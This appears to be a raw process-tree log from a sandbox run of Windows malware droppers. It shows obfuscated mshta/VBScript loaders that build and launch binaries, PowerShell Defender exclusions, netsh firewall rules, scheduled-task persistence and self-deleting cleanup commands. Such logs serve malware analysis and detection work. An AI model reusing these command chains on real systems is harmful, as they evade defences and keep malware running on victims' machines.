"C:\Users\Admin\AppData\Local\Temp\is-NCTT6.tmp\DYbALA.exe" /S /UID=2709
7⤵
PID:6592

C:\Users\Admin\AppData\Local\Temp\02-6d479-efd-d60ae-44e8f7f89a29d\Kunupyzhylo.exe
"C:\Users\Admin\AppData\Local\Temp\02-6d479-efd-d60ae-44e8f7f89a29d\Kunupyzhylo.exe"
8⤵
PID:5460

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
dw20.exe -x -s 2252
9⤵
PID:9328

C:\Users\Admin\AppData\Local\Temp\8c-af29a-a38-d6a8f-9e7af29f56b3e\Jaguxaebipae.exe
"C:\Users\Admin\AppData\Local\Temp\8c-af29a-a38-d6a8f-9e7af29f56b3e\Jaguxaebipae.exe"
8⤵
PID:4476

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yuv25l05.0gc\GcleanerEU.exe /eufive & exit
9⤵
PID:7920

C:\Users\Admin\AppData\Local\Temp\yuv25l05.0gc\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\yuv25l05.0gc\GcleanerEU.exe /eufive
10⤵
PID:1764

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q2u0qf2z.blo\installer.exe /qn CAMPAIGN="654" & exit
9⤵
PID:7312

C:\Users\Admin\AppData\Local\Temp\q2u0qf2z.blo\installer.exe
C:\Users\Admin\AppData\Local\Temp\q2u0qf2z.blo\installer.exe /qn CAMPAIGN="654"
10⤵
PID:8740

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qb3dtuwb.zbo\any.exe & exit
9⤵
PID:5340

C:\Users\Admin\AppData\Local\Temp\qb3dtuwb.zbo\any.exe
C:\Users\Admin\AppData\Local\Temp\qb3dtuwb.zbo\any.exe
10⤵
PID:8876

C:\Users\Admin\AppData\Local\Temp\qb3dtuwb.zbo\any.exe
"C:\Users\Admin\AppData\Local\Temp\qb3dtuwb.zbo\any.exe" -u
11⤵
PID:9136

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2tjcwk15.fql\gcleaner.exe /mixfive & exit
9⤵
PID:2908

C:\Users\Admin\AppData\Local\Temp\2tjcwk15.fql\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\2tjcwk15.fql\gcleaner.exe /mixfive
10⤵
PID:7828

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n3y23sgf.gyd\autosubplayer.exe /S & exit
9⤵
PID:668

C:\Program Files\Common Files\PELOFRMUMU\foldershare.exe
"C:\Program Files\Common Files\PELOFRMUMU\foldershare.exe" /VERYSILENT
8⤵
PID:5156

C:\Users\Admin\Pictures\Adobe Films\pg3sBy27n_S5EnZhSjwDf610.exe
"C:\Users\Admin\Pictures\Adobe Films\pg3sBy27n_S5EnZhSjwDf610.exe"
5⤵
PID:6680

C:\Users\Admin\Pictures\Adobe Films\m0tw7D4K3Xt_699FZlGGvvZM.exe
"C:\Users\Admin\Pictures\Adobe Films\m0tw7D4K3Xt_699FZlGGvvZM.exe"
5⤵
PID:420

C:\Users\Admin\Pictures\Adobe Films\m0tw7D4K3Xt_699FZlGGvvZM.exe
"C:\Users\Admin\Pictures\Adobe Films\m0tw7D4K3Xt_699FZlGGvvZM.exe" -u
6⤵
PID:5656

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:7932

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:4160

C:\Users\Admin\Pictures\Adobe Films\CmP8WQcQIe09qWeNkvEOhtAh.exe
"C:\Users\Admin\Pictures\Adobe Films\CmP8WQcQIe09qWeNkvEOhtAh.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2756

C:\Users\Admin\Pictures\Adobe Films\L6I6NKG1SWCIDwWSCHB1rBJU.exe
"C:\Users\Admin\Pictures\Adobe Films\L6I6NKG1SWCIDwWSCHB1rBJU.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4024

C:\Users\Admin\Pictures\Adobe Films\L6I6NKG1SWCIDwWSCHB1rBJU.exe
"C:\Users\Admin\Pictures\Adobe Films\L6I6NKG1SWCIDwWSCHB1rBJU.exe"
4⤵
- Executes dropped EXE
PID:4300

C:\Users\Admin\Pictures\Adobe Films\mbSorhGxB1pNBjghFG36e2Ru.exe
"C:\Users\Admin\Pictures\Adobe Films\mbSorhGxB1pNBjghFG36e2Ru.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:3224

C:\Users\Admin\Pictures\Adobe Films\B6Bw0roWFP55xUoOvHs45zOz.exe
"C:\Users\Admin\Pictures\Adobe Films\B6Bw0roWFP55xUoOvHs45zOz.exe"
3⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:3116

C:\Program Files (x86)\Company\NewProduct\cutm3.exe
"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
4⤵
- Executes dropped EXE
PID:4896

C:\Users\Admin\Pictures\Adobe Films\XLxRmbPcDQ4F7J32lIdFDeny.exe
"C:\Users\Admin\Pictures\Adobe Films\XLxRmbPcDQ4F7J32lIdFDeny.exe"
3⤵
- Executes dropped EXE
PID:3188

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "XLxRmbPcDQ4F7J32lIdFDeny.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\XLxRmbPcDQ4F7J32lIdFDeny.exe" & exit
4⤵
PID:5756

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "XLxRmbPcDQ4F7J32lIdFDeny.exe" /f
5⤵
- Kills process with taskkill
PID:4384

C:\Users\Admin\Pictures\Adobe Films\ofHj9XDxpCLOcd4Ya1bSIs3C.exe
"C:\Users\Admin\Pictures\Adobe Films\ofHj9XDxpCLOcd4Ya1bSIs3C.exe"
3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:2684

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
4⤵
PID:5804

C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
4⤵
PID:5944

C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
4⤵
PID:808

C:\Windows\System\svchost.exe
"C:\Windows\System\svchost.exe" formal
4⤵
PID:5592

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
5⤵
PID:6276

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
5⤵
PID:6344

C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
5⤵
PID:6524

C:\Windows\System32\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
5⤵
PID:6444

C:\Windows\SYSTEM32\schtasks.exe
schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
4⤵
- Creates scheduled task(s)
PID:1892

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
4⤵
PID:4356

C:\Users\Admin\Pictures\Adobe Films\0u2xG04QKCAjjQdTQBYBGzVU.exe
"C:\Users\Admin\Pictures\Adobe Films\0u2xG04QKCAjjQdTQBYBGzVU.exe"
3⤵
- Executes dropped EXE
PID:2212

C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
"C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4048

C:\Users\Admin\AppData\Local\803309.exe
"C:\Users\Admin\AppData\Local\803309.exe"
5⤵
PID:5240

C:\Users\Admin\AppData\Local\784388.exe
"C:\Users\Admin\AppData\Local\784388.exe"
5⤵
PID:4148

C:\Users\Admin\AppData\Local\539665.exe
"C:\Users\Admin\AppData\Local\539665.exe"
5⤵
PID:4276

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL"). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Local\539665.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF """" == """" for %Z iN ( ""C:\Users\Admin\AppData\Local\539665.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ))
6⤵
PID:7980

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Local\539665.exe" ..\RxAPuFNW.exe &&sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "" == "" for %Z iN ( "C:\Users\Admin\AppData\Local\539665.exe" ) do taskkill -f -Im "%~NXZ"
7⤵
PID:6016

C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe
..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i
8⤵
PID:8588

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL"). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF ""-P1jBMdKQQ16j1dp4oT~i "" == """" for %Z iN ( ""C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ))
9⤵
PID:8908

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ..\RxAPuFNW.exe &&sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "-P1jBMdKQQ16j1dp4oT~i " == "" for %Z iN ( "C:\Users\Admin\AppData\Local\Temp\RxAPuFNW.exe" ) do taskkill -f -Im "%~NXZ"
10⤵
PID:9164

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBSCRipT: CLOse ( createoBJECt ( "wScRIpt.shelL" ).RUn ("cMd /C EChO | SEt /p = ""MZ"" > CPkPI.i & CopY /b /Y CPkpI.I+ sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K & Del /Q * " , 0 ,tRue ) )
9⤵
PID:6568

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C EChO | SEt /p = "MZ" > CPkPI.i &CopY /b /Y CPkpI.I+ sQCC.RrX + NvzjY~Q7.S1K+ FZOB0ELr.D +wXR7c.DF ..\WfNrfms4.K & StARt control ..\WfNRfms4.K &Del /Q *
10⤵
PID:6840

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EChO "
11⤵
PID:6216

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>CPkPI.i"
11⤵
PID:4620

C:\Windows\SysWOW64\control.exe
control ..\WfNRfms4.K
11⤵
PID:7404

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\WfNRfms4.K
12⤵
PID:2452

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -Im "539665.exe"
8⤵
- Kills process with taskkill
PID:8792

C:\Users\Admin\AppData\Local\8059423.exe
"C:\Users\Admin\AppData\Local\8059423.exe"
5⤵
PID:7228

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
6⤵
PID:8124

C:\Users\Admin\AppData\Local\137866.exe
"C:\Users\Admin\AppData\Local\137866.exe"
5⤵
PID:7512

C:\Users\Admin\AppData\Local\Temp\WW1Soft.exe
"C:\Users\Admin\AppData\Local\Temp\WW1Soft.exe"
4⤵
- Executes dropped EXE
PID:4236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4236 -s 1540
5⤵
- Program crash
PID:8068

C:\Users\Admin\AppData\Local\Temp\liuchang-game.exe
"C:\Users\Admin\AppData\Local\Temp\liuchang-game.exe"
4⤵
- Executes dropped EXE
PID:4476

C:\Users\Admin\AppData\Local\Temp\askinstall25.exe
"C:\Users\Admin\AppData\Local\Temp\askinstall25.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5100

C:\Users\Admin\AppData\Local\Temp\inst1.exe
"C:\Users\Admin\AppData\Local\Temp\inst1.exe"
4⤵
- Executes dropped EXE
PID:4740

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
4⤵
- Executes dropped EXE
PID:4204

C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
4⤵
- Executes dropped EXE
PID:4836

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
5⤵
PID:5604

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
6⤵
PID:2700

C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
7⤵
PID:6476

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
8⤵
PID:7064

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
9⤵
PID:6964

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )
8⤵
PID:8768

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC
9⤵
PID:9080

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EcHo "
10⤵
PID:4556

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
10⤵
PID:5344

C:\Windows\SysWOW64\msiexec.exe
msiexec -Y ..\lXQ2g.WC
10⤵
PID:6292

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -iM "search_hyperfs_206.exe"
7⤵
- Kills process with taskkill
PID:7312

C:\Users\Admin\AppData\Local\Temp\setup_2.exe
"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
4⤵
- Executes dropped EXE
PID:5044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 656
5⤵
- Program crash
PID:5640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 668
5⤵
- Program crash
PID:5976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 676
5⤵
- Program crash
PID:3640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 688
5⤵
- Program crash
PID:6104

C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2332

C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
5⤵
PID:4192

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--bo6y9QQgnM"
6⤵
PID:5676

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1c0,0x1bc,0x1b8,0x1c4,0x1b4,0x7ffbfd07dec0,0x7ffbfd07ded0,0x7ffbfd07dee0
7⤵
PID:4860

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1720,11728144235834901634,12809831083448425861,131072 --lang=de --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5676_446250908" --mojo-platform-channel-handle=1784 /prefetch:8
7⤵
PID:9284

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1720,11728144235834901634,12809831083448425861,131072 --lang=de --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5676_446250908" --mojo-platform-channel-handle=2188 /prefetch:8
7⤵
PID:9300

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1720,11728144235834901634,12809831083448425861,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5676_446250908" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1736 /prefetch:2
7⤵
PID:9276

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1720,11728144235834901634,12809831083448425861,131072 --lang=de --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5676_446250908" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2524 /prefetch:1
7⤵
PID:9384

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1720,11728144235834901634,12809831083448425861,131072 --lang=de --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5676_446250908" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2496 /prefetch:1
7⤵
PID:9372

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1720,11728144235834901634,12809831083448425861,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5676_446250908" --mojo-platform-channel-handle=3208 /prefetch:8
7⤵
PID:9792

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1720,11728144235834901634,12809831083448425861,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5676_446250908" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3264 /prefetch:2
7⤵
PID:1572

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1720,11728144235834901634,12809831083448425861,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5676_446250908" --mojo-platform-channel-handle=3440 /prefetch:8
7⤵
PID:5976

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1720,11728144235834901634,12809831083448425861,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5676_446250908" --mojo-platform-channel-handle=3656 /prefetch:8
7⤵
PID:9836

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1720,11728144235834901634,12809831083448425861,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5676_446250908" --mojo-platform-channel-handle=2700 /prefetch:8
7⤵
PID:4492

C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1720,11728144235834901634,12809831083448425861,131072 --lang=de --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5676_446250908" --mojo-platform-channel-handle=3788 /prefetch:8
7⤵
PID:9904

C:\Users\Admin\AppData\Local\Temp\chrome1.exe
"C:\Users\Admin\AppData\Local\Temp\chrome1.exe"
4⤵
PID:4908

C:\Users\Admin\AppData\Local\Temp\chrome2.exe
"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
4⤵
- Executes dropped EXE
PID:5372

C:\Users\Admin\AppData\Local\Temp\chrome update.exe
"C:\Users\Admin\AppData\Local\Temp\chrome update.exe"
4⤵
- Executes dropped EXE
PID:5244

C:\Users\Admin\Pictures\Adobe Films\scfT65Yi8gy0dT5r5wdXmZND.exe
"C:\Users\Admin\Pictures\Adobe Films\scfT65Yi8gy0dT5r5wdXmZND.exe"
3⤵
- Executes dropped EXE
PID:3684

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\scfT65Yi8gy0dT5r5wdXmZND.exe" & exit
4⤵
PID:7756

C:\Windows\SysWOW64\timeout.exe
timeout /t 5
5⤵
- Delays execution with timeout.exe
PID:3804

C:\Users\Admin\Pictures\Adobe Films\IuYBm3lYwBFvWH4EQPU9_Ywq.exe
"C:\Users\Admin\Pictures\Adobe Films\IuYBm3lYwBFvWH4EQPU9_Ywq.exe"
3⤵
- Executes dropped EXE
PID:2496

C:\Users\Admin\Pictures\Adobe Films\IuYBm3lYwBFvWH4EQPU9_Ywq.exe
"C:\Users\Admin\Pictures\Adobe Films\IuYBm3lYwBFvWH4EQPU9_Ywq.exe"
4⤵
PID:5356

C:\Users\Admin\Pictures\Adobe Films\ydWz5wGfm19stkAY4iMIn9Xd.exe
"C:\Users\Admin\Pictures\Adobe Films\ydWz5wGfm19stkAY4iMIn9Xd.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2068

C:\Users\Admin\Pictures\Adobe Films\_Jl5NRQH_VCxgKevGBMlhDUr.exe
"C:\Users\Admin\Pictures\Adobe Films\_Jl5NRQH_VCxgKevGBMlhDUr.exe"
3⤵
- Executes dropped EXE
PID:2064

C:\Users\Admin\Pictures\Adobe Films\fIluvx59br0pDNhWxyCvlECC.exe
"C:\Users\Admin\Pictures\Adobe Films\fIluvx59br0pDNhWxyCvlECC.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3688

C:\Users\Admin\Pictures\Adobe Films\64sJSaHtBgpmY3s9JraLL3AH.exe
